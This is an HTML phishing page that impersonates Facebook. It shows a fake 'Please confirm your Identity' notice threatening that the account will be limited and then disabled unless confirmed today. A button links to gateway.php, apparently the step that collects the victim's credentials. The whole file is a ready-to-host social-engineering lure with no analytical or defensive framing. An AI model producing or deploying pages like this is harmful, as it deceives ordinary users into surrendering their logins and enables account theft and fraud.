<html>
<head>
<title> Please confirm your Identity</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
</head>
<center><div class="container"><br><Br>
<div class="well">
<img src="logo.png" width=90%><hr>
Dear user,<br>
Your Facebook account must be <strong>confirmed</strong> today in order to avoid disabling! This process is quick and must be done
by all of our users as an extra security measure. If you fail to confirm your account today it will be limited and then disabled!<hr>
<a href="gateway.php" class="btn btn-primary">Confirm your Identity now</a>
</div></div>
</center>